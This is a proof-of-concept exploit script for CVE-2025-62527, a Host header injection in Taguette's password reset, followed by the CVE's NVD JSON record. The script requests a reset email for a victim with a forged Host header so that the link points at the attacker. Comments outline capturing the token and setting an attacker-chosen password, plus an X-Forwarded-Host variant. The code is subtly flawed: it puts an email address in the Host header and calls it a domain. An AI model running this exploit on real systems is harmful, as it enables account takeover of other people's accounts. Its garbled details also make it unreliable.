CVE-2025-62527

# CVE-2025-62527 PoC - Taguette Password Reset Link Hijacking # Vulnerability: Host header injection in password reset functionality # Affected: Taguette versions < 1.5.0 import requests TARGET_URL = "http://target-taguette-instance.com" ATTACKER_EMAIL = "[email protected]" VICTIM_EMAIL = "[email protected]" def exploit_password_reset(): """ Exploit the password reset functionality by injecting a malicious Host header. The reset link sent to the victim will contain the attacker's domain. """ # Step 1: Request password reset with manipulated Host header reset_endpoint = f"{TARGET_URL}/reset" headers = { "Host": ATTACKER_EMAIL, # Inject attacker's domain "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0" } data = { "email": VICTIM_EMAIL } # Step 2: Send the password reset request response = requests.post(reset_endpoint, headers=headers, data=data) if response.status_code == 200: print(f"[+] Password reset email sent to {VICTIM_EMAIL}") print(f"[+] The reset link now points to: {ATTACKER_EMAIL}") print("[+] Waiting for victim to click the malicious link...") else: print(f"[-] Request failed with status code: {response.status_code}") # Step 3: When victim clicks the link, the reset token is sent to attacker # Step 4: Attacker uses the token to reset victim's password # reset_url = f"{TARGET_URL}/reset/{captured_token}" # new_password = "attacker_controlled_password" # requests.post(reset_url, data={"password": new_password}) if __name__ == "__main__": exploit_password_reset() # Alternative: X-Forwarded-Host header injection # headers["X-Forwarded-Host"] = ATTACKER_EMAIL

{"cve": {"id": "CVE-2025-62527", "sourceIdentifier": "[email protected]", "published": "2025-10-20T20:15:37.573", "lastModified": "2025-10-30T17:00:06.013", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Taguette is an open source qualitative research tool. An issue has been discovered in Taguette versions prior to 1.5.0. It was possible for an attacker to request password reset email containing a malicious link, allowing the attacker to set the email if clicked by the victim. This issue has been patched in version 1.5.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-15"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:taguette:taguette:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.5.0", "matchCriteriaId": "1B5838E2-2351-49D8-9FFA-B7A2A99E9DD3"}]}]}], "references": [{"url": "https://github.com/remram44/taguette/security/advisories/GHSA-7rc8-5c8q-jr6j", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://gitlab.com/remram44/taguette/-/issues/331", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}